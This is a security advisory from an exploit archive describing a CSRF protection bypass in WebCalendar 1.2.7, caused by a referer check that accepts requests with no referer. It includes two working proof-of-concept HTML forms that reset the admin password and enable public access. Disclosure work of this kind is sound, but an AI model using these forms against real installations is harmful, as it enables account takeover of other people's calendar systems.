exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

WebCalendar 1.2.7 CSRF Bypass

WebCalendar 1.2.7 CSRF Bypass
Posted Jul 4, 2016
Authored by hyp3rlinx | Site hyp3rlinx.altervista.org

WebCalendar version 1.2.7 attempts to uses the HTTP Referer to check that requests are originating from same server. However, this can be easily defeated by just not sending a referer.

tags | exploit, web
SHA-256 | b21b04f0900a0f57b17194ed5f9dc60a1ad09467022464b6d1d905884edfc003

WebCalendar 1.2.7 CSRF Bypass

Change Mirror Download
[+] Credits: John Page aka HYP3RLINX

[+] Website: hyp3rlinx.altervista.org

[+] Source:
http://hyp3rlinx.altervista.org/advisories/WEBCALENDAR-V1.2.7-CSRF-PROTECTION-BYPASS.txt

[+] ISR: ApparitionSec



Vendor:
==========================
www.k5n.us/webcalendar.php



Product:
==================
WebCalendar v1.2.7

WebCalendar is a PHP-based calendar application that can be configured as a
single-user calendar, a multi-user calendar for groups of users, or as an
event calendar viewable by visitors. MySQL, PostgreSQL, Oracle, DB2,
Interbase, MS SQL Server, or ODBC is required.

WebCalendar can be setup in a variety of ways, such as...

A schedule management system for a single person
A schedule management system for a group of people, allowing one or more
assistants to manage the calendar of another user
An events schedule that anyone can view, allowing visitors to submit new
events
A calendar server that can be viewed with iCalendar-compliant calendar
applications like Mozilla Sunbird, Apple iCal or GNOME Evolution or
RSS-enabled
applications like Firefox, Thunderbird, RSSOwl, FeedDemon, or BlogExpress.




Vulnerability Type:
======================
CSRF PROTECTION BYPASS



CVE Reference:
==============
N/A



Vulnerability Details:
=====================

WebCalendar attempts to uses the HTTP Referer to check that requests are
originating from same server as we see below.

>From WebCalendar "include/functions.php" file on line 6117:

////////////////////////////////////////////////////////////

function require_valide_referring_url ()
{

global $SERVER_URL;


if ( empty( $_SERVER['HTTP_REFERER'] ) ) {

// Missing the REFERER value

//die_miserable_death ( translate ( 'Invalid referring URL' ) );

// Unfortunately, some version of MSIE do not send this info.

return true;
}

if ( ! preg_match ( "@$SERVER_URL@i", $_SERVER['HTTP_REFERER'] ) ) {

// Gotcha. URL of referring page is not the same as our server.

// This can be an instance of XSRF.

// (This may also happen when more than address is used for your server.

// However, you're not supposed to do that with this version of

// WebCalendar anyhow...)
die_miserable_death ( translate ( 'Invalid referring URL' ) );

}

}

/////////////////////////////////////////////////////////////////////////////////////////

However, this can be easily defeated by just not sending a referer. HTML 5
includes a handy tag <meta name="referrer" content="none"> to omit the
referer
when making an HTTP request, currently supported in Chrome, Safari,
MobileSafari and other WebKit-based browsers. Using this meta tag we send
no referrer
and the vulnerable application will then happily process our CSRF requests.



Exploit code(s):
===============

1) CSRF Protection Bypass to change Admin password POC. Note: Name of the
victim user is required for success.


<meta name="referrer" content="none">

<form id="CSRF" action="
http://localhost/WebCalendar-1.2.7/edit_user_handler.php" method="post">
<input type="hidden" name="formtype" value="setpassword" />
<input type="hidden" name="user" value="admin" />
<input name="upassword1" id="newpass1" type="password" value="1234567" />
<input name="upassword2" id="newpass2" type="password" value="1234567" />
</form>


2) CSRF Protection Bypass modify access controls under "System Settings" /
"Allow public access"

<meta name="referrer" content="none">

<form id="CSRF_ACCESS_CTRL" action="
http://localhost/WebCalendar-1.2.7/admin.php" method="post"
name="prefform"><br />
<input type="hidden" name="currenttab" id="currenttab" value="settings" />
<input type="submit" value="Save" name="" />
<input type="hidden" name="admin_PUBLIC_ACCESS" value="Y" />
<script>document.getElementById('CSRF_ACCESS_CTRL').submit()</script>
</form>




Disclosure Timeline:
===============================
Vendor Notification: No replies
July 4, 2016 : Public Disclosure




Exploitation Technique:
=======================
Remote



Severity Level:
================
6.8 (Medium)
CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N


[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere.

HYP3RLINX
Login or Register to add favorites

File Archive:

January 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jan 1st
    0 Files
  • 2
    Jan 2nd
    13 Files
  • 3
    Jan 3rd
    5 Files
  • 4
    Jan 4th
    5 Files
  • 5
    Jan 5th
    9 Files
  • 6
    Jan 6th
    5 Files
  • 7
    Jan 7th
    0 Files
  • 8
    Jan 8th
    0 Files
  • 9
    Jan 9th
    18 Files
  • 10
    Jan 10th
    31 Files
  • 11
    Jan 11th
    30 Files
  • 12
    Jan 12th
    33 Files
  • 13
    Jan 13th
    25 Files
  • 14
    Jan 14th
    0 Files
  • 15
    Jan 15th
    0 Files
  • 16
    Jan 16th
    7 Files
  • 17
    Jan 17th
    25 Files
  • 18
    Jan 18th
    38 Files
  • 19
    Jan 19th
    6 Files
  • 20
    Jan 20th
    21 Files
  • 21
    Jan 21st
    0 Files
  • 22
    Jan 22nd
    0 Files
  • 23
    Jan 23rd
    24 Files
  • 24
    Jan 24th
    68 Files
  • 25
    Jan 25th
    22 Files
  • 26
    Jan 26th
    20 Files
  • 27
    Jan 27th
    17 Files
  • 28
    Jan 28th
    0 Files
  • 29
    Jan 29th
    0 Files
  • 30
    Jan 30th
    20 Files
  • 31
    Jan 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close